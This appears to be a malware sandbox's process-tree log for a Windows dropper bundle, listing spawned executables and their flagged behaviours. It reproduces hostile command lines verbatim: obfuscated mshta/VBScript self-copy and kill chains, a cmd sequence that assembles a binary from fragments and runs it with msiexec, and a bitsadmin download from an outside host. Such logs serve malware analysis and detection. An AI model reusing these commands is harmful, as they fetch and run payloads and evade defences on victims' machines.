C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe"C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe"9⤵PID:8180
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:2468 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:7064
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe"C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6436
-
-
C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:6432 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:3348
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
- Checks whether UAC is enabled
PID:7356 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵
- Checks whether UAC is enabled
PID:2572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:7620
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵
- Checks whether UAC is enabled
PID:7100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:6344
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:6848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
- Loads dropped DLL
PID:5360
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
- Executes dropped EXE
PID:4216
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "wkXv2fTh4gd_QhZD3v2cNXAC.exe"12⤵
- Kills process with taskkill
PID:2032
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe"C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe"9⤵PID:5440
-
-
C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe"C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe"9⤵
- Loads dropped DLL
PID:6120 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5192 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
PID:7424 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1cc,0x1f4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee012⤵PID:7864
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e9013⤵PID:3252
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:212⤵PID:8620
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1868 /prefetch:812⤵PID:8728
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2304 /prefetch:812⤵PID:8784
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1756 /prefetch:112⤵
- Checks computer location settings
PID:8856
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2620 /prefetch:112⤵
- Checks computer location settings
PID:8840
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2864 /prefetch:812⤵PID:9072
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3380 /prefetch:212⤵PID:764
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2820 /prefetch:812⤵PID:9064
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=3856 /prefetch:812⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6796
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1764 /prefetch:812⤵PID:2296
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1480 /prefetch:812⤵PID:1748
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe"C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe"9⤵PID:2840
-
C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe"C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe" -u10⤵PID:6884
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"9⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp"C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp" /SL5="$80596,506127,422400,C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"10⤵
- Loads dropped DLL
- Checks whether UAC is enabled
PID:6872 -
C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
PID:4600 -
C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe"C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe"12⤵
- Checks whether UAC is enabled
PID:2348 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive & exit13⤵
- Checks whether UAC is enabled
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive14⤵PID:6476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:7808
-
C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exeC:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654"14⤵
- Checks whether UAC is enabled
PID:904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe & exit13⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exeC:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe14⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe"C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe" -u15⤵PID:8736
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive & exit13⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive14⤵PID:7996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S & exit13⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S14⤵
- Drops file in Program Files directory
PID:3504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:2308
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:9020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:9080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:7900
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:7588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵PID:3304
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:3320
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:1968
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe5⤵PID:3812
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178d8e5d06822.exeMon178d8e5d06822.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Users\Admin\AppData\Roaming\2954983.exe"C:\Users\Admin\AppData\Roaming\2954983.exe"9⤵
- Executes dropped EXE
PID:5408
-
-
C:\Users\Admin\AppData\Roaming\5338000.exe"C:\Users\Admin\AppData\Roaming\5338000.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5284
-
-
C:\Users\Admin\AppData\Roaming\4151522.exe"C:\Users\Admin\AppData\Roaming\4151522.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6064
-
-
C:\Users\Admin\AppData\Roaming\5406726.exe"C:\Users\Admin\AppData\Roaming\5406726.exe"9⤵
- Executes dropped EXE
PID:4488 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5406726.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5406726.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )10⤵
- Checks whether UAC is enabled
PID:5768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5406726.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\5406726.exe") do taskkill /im "%~nxT" /f11⤵PID:5508
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5406726.exe" /f12⤵
- Kills process with taskkill
PID:6212
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\2367830.exe"C:\Users\Admin\AppData\Roaming\2367830.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2196
-
-
C:\Users\Admin\AppData\Roaming\5093277.exe"C:\Users\Admin\AppData\Roaming\5093277.exe"9⤵
- Executes dropped EXE
PID:5904
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
PID:3852
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4296 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
- Checks whether UAC is enabled
PID:3712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:1324
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5436 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
- Checks whether UAC is enabled
PID:5728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:5976
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:4852
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:5104
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
PID:7832
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:6120
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
PID:4252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 7929⤵
- Program crash
PID:5968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8049⤵
- Program crash
PID:1368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 8129⤵
- Program crash
PID:5880
-
-
